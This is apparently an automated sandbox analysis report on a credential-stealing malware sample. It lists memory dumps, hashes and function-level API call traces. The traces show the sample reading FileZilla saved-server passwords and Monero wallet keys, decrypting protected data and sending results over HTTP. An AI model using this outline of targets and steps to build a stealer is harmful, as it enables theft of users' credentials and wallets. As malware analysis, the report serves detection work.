                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              • Opcode ID: 57795c5f50eb44f3c337fd64dc674bc4eac6cbf6d7cbe325275c90374242c6bc
                              • Instruction ID: 68664292ec27834cb89f96bdb548b4a45a51587c0cbb889441206faba67daf1e
                              • Opcode Fuzzy Hash: 57795c5f50eb44f3c337fd64dc674bc4eac6cbf6d7cbe325275c90374242c6bc
                              • Instruction Fuzzy Hash: 2311CCB8A00209DFDB05DF98D989AAE77B5FF88300F104559F915A7350D774AE14CFA1
                              Function 006E65B9 Relevance: 4.0, Strings: 2, Instructions: 1550COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: %^h$K@=
                              • API String ID: 0-2285590521
                              • Opcode ID: 9e907fc9eab6fd7cb8f5b423093bf7582bf7d1e27b378de91f78ddfa9eae6ee7
                              • Instruction ID: a7bcdee01b3890b962aaed9c40d110483975ce7f641aa12093d276ca248d0cee
                              • Opcode Fuzzy Hash: 9e907fc9eab6fd7cb8f5b423093bf7582bf7d1e27b378de91f78ddfa9eae6ee7
                              • Instruction Fuzzy Hash: 1CA209F360C2049FE304AE2DEC8567ABBE5EF94720F1A853DE6C4C3744EA3598058697
                              Function 006ED9D8 Relevance: 3.3, Strings: 2, Instructions: 836COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: <"~$T{
                              • API String ID: 0-1865613160
                              • Opcode ID: e41beca78ed26038ea7a4f1d0a6dba77d52f3302b88ad0cd3031384d46ba89b7
                              • Instruction ID: dfd44b2db8a93a32b208011a87ac16d01101934e72234d3d7432ca4d2b23f2de
                              • Opcode Fuzzy Hash: e41beca78ed26038ea7a4f1d0a6dba77d52f3302b88ad0cd3031384d46ba89b7
                              • Instruction Fuzzy Hash: 4F423BF3A0C2009FE3046E2DEC8567AF7E9EB94320F1A463DEAC4D7740EA3558158697
                              Function 006DB3C8 Relevance: 2.7, Strings: 2, Instructions: 206COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: TP~$qC~}
                              • API String ID: 0-3457400484
                              • Opcode ID: 1737ff59433949f0aa1133dccc09c58cedf6c0ffef3404abcafec0234c876b1f
                              • Instruction ID: f53383b56e30554e2f60e5c2c8d4497635b9d6fbc61e013bb9e8b3f6b94e55d5
                              • Opcode Fuzzy Hash: 1737ff59433949f0aa1133dccc09c58cedf6c0ffef3404abcafec0234c876b1f
                              • Instruction Fuzzy Hash: 225157F3A081105FE3486A29DC557BBB7D7EBD4724F16463DE689D7384E9394C028291
                              Function 006EF579 Relevance: 1.9, Strings: 1, Instructions: 685COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: x
                              • API String ID: 0-1128350533
                              • Opcode ID: 72ba0d73e8c9128928b8a87a904af05e7f829885e73585aa31f160452a3f178d
                              • Instruction ID: e6c84887ee5486d9b634835a8b9eb2c2cb0e013e0dc059be15afc92e10bfcf91
                              • Opcode Fuzzy Hash: 72ba0d73e8c9128928b8a87a904af05e7f829885e73585aa31f160452a3f178d
                              • Instruction Fuzzy Hash: D822D2F360C3009FE704AF29EC8576ABBE5EF94320F16893DE6C583744E63598458A87
                              Function 005BC535 Relevance: .2, Instructions: 211COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1bf99f64b1b80e6bf2ee3a3665a96511f6930ec86aea9be9bc173573c8d0e3fc
                              • Instruction ID: 6e60031dda65b0f95e0d0bbea0267ed192ba494f01ca76d007f6950d56f8fcc6
                              • Opcode Fuzzy Hash: 1bf99f64b1b80e6bf2ee3a3665a96511f6930ec86aea9be9bc173573c8d0e3fc
                              • Instruction Fuzzy Hash: C96102F3E082149BE3046A28EC8477ABBD5EB94320F2A453DDBC497780EA7D1C558696
                              Function 006A11FB Relevance: .2, Instructions: 190COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 312d996d7dff0a762c62b90cdb7f406ef5ae2140a2894fa90b532742f999fd34
                              • Instruction ID: 0ecedddd30f71b9fb6e4e464aa653c11e517fd5e86dc3b82f66f2fce53d69c6e
                              • Opcode Fuzzy Hash: 312d996d7dff0a762c62b90cdb7f406ef5ae2140a2894fa90b532742f999fd34
                              • Instruction Fuzzy Hash: E2515AF3E082009BE3046E3CEC5576ABBD5EB94320F2B453DEAC9D3784E97959058786
                              Function 005EDB69 Relevance: .1, Instructions: 123COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f21330d6e5d32c65980ebde1e4bbbca7348e6f496367503dbdb84f662b252764
                              • Instruction ID: 854f06250d8189c878489417babda79efad0609314d733f8ea43922fd17d518b
                              • Opcode Fuzzy Hash: f21330d6e5d32c65980ebde1e4bbbca7348e6f496367503dbdb84f662b252764
                              • Instruction Fuzzy Hash: 483107F3F543245BF354487DED847A66AC6D7A4360F2F8639AA88E7BC4E4BD8D054280
                              Function 00339750 Relevance: .0, Instructions: 15COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                              Function 00330250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                                • Part of subcall function 00338DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00338E0B
                                • Part of subcall function 0033A920: lstrcpy.KERNEL32(00000000,?), ref: 0033A972
                                • Part of subcall function 0033A920: lstrcat.KERNEL32(00000000), ref: 0033A982
                                • Part of subcall function 0033A8A0: lstrcpy.KERNEL32(?,00340E17), ref: 0033A905
                                • Part of subcall function 0033A9B0: lstrlen.KERNEL32(?,01099048,?,\Monero\wallet.keys,00340E17), ref: 0033A9C5
                                • Part of subcall function 0033A9B0: lstrcpy.KERNEL32(00000000), ref: 0033AA04
                                • Part of subcall function 0033A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0033AA12
                                • Part of subcall function 0033A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0033A7E6
                                • Part of subcall function 003299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003299EC
                                • Part of subcall function 003299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00329A11
                                • Part of subcall function 003299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00329A31
                                • Part of subcall function 003299C0: ReadFile.KERNEL32(000000FF,?,00000000,0032148F,00000000), ref: 00329A5A
                                • Part of subcall function 003299C0: LocalFree.KERNEL32(0032148F), ref: 00329A90
                                • Part of subcall function 003299C0: CloseHandle.KERNEL32(000000FF), ref: 00329A9A
                                • Part of subcall function 00338E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00338E52
                              • GetProcessHeap.KERNEL32(00000000,000F423F,00340DBA,00340DB7,00340DB6,00340DB3), ref: 00330362
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00330369
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 00330385
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00340DB2), ref: 00330393
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 003303CF
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00340DB2), ref: 003303DD
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 00330419
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00340DB2), ref: 00330427
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00330463
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00340DB2), ref: 00330475
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00340DB2), ref: 00330502
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00340DB2), ref: 0033051A
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00340DB2), ref: 00330532
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00340DB2), ref: 0033054A
                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00330562
                              • lstrcat.KERNEL32(?,profile: null), ref: 00330571
                              • lstrcat.KERNEL32(?,url: ), ref: 00330580
                              • lstrcat.KERNEL32(?,00000000), ref: 00330593
                              • lstrcat.KERNEL32(?,00341678), ref: 003305A2
                              • lstrcat.KERNEL32(?,00000000), ref: 003305B5
                              • lstrcat.KERNEL32(?,0034167C), ref: 003305C4
                              • lstrcat.KERNEL32(?,login: ), ref: 003305D3
                              • lstrcat.KERNEL32(?,00000000), ref: 003305E6
                              • lstrcat.KERNEL32(?,00341688), ref: 003305F5
                              • lstrcat.KERNEL32(?,password: ), ref: 00330604
                              • lstrcat.KERNEL32(?,00000000), ref: 00330617
                              • lstrcat.KERNEL32(?,00341698), ref: 00330626
                              • lstrcat.KERNEL32(?,0034169C), ref: 00330635
                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00340DB2), ref: 0033068E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 1942843190-555421843
                              • Opcode ID: 360c86ccbca85c723872c55c219f2ebe210b714564c7366b18ae038a97af2097
                              • Instruction ID: 3b07243eb347d9c82f53ad1cbda0dbfbdbb47befc8fcfd77d39937ebd658dcb3
                              • Opcode Fuzzy Hash: 360c86ccbca85c723872c55c219f2ebe210b714564c7366b18ae038a97af2097
                              • Instruction Fuzzy Hash: 02D11B72910608ABCB06EBE4DDD6EEE7778EF14300F544418F542BF091DE74AA4ADB62
                              Function 00325960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0033A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0033A7E6
                                • Part of subcall function 003247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00324839
                                • Part of subcall function 003247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00324849
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 003259F8
                              • StrCmpCA.SHLWAPI(?,0109E7E8), ref: 00325A13
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00325B93
                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0109E778,00000000,?,0109A420,00000000,?,00341A1C), ref: 00325E71
                              • lstrlen.KERNEL32(00000000), ref: 00325E82
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00325E93
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00325E9A
                              • lstrlen.KERNEL32(00000000), ref: 00325EAF
                              • lstrlen.KERNEL32(00000000), ref: 00325ED8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00325EF1
                              • lstrlen.KERNEL32(00000000,?,?), ref: 00325F1B
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00325F2F
                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00325F4C
                              • InternetCloseHandle.WININET(00000000), ref: 00325FB0
                              • InternetCloseHandle.WININET(00000000), ref: 00325FBD
                              • HttpOpenRequestA.WININET(00000000,0109E828,?,0109E398,00000000,00000000,00400100,00000000), ref: 00325BF8
                                • Part of subcall function 0033A9B0: lstrlen.KERNEL32(?,01099048,?,\Monero\wallet.keys,00340E17), ref: 0033A9C5
                                • Part of subcall function 0033A9B0: lstrcpy.KERNEL32(00000000), ref: 0033AA04
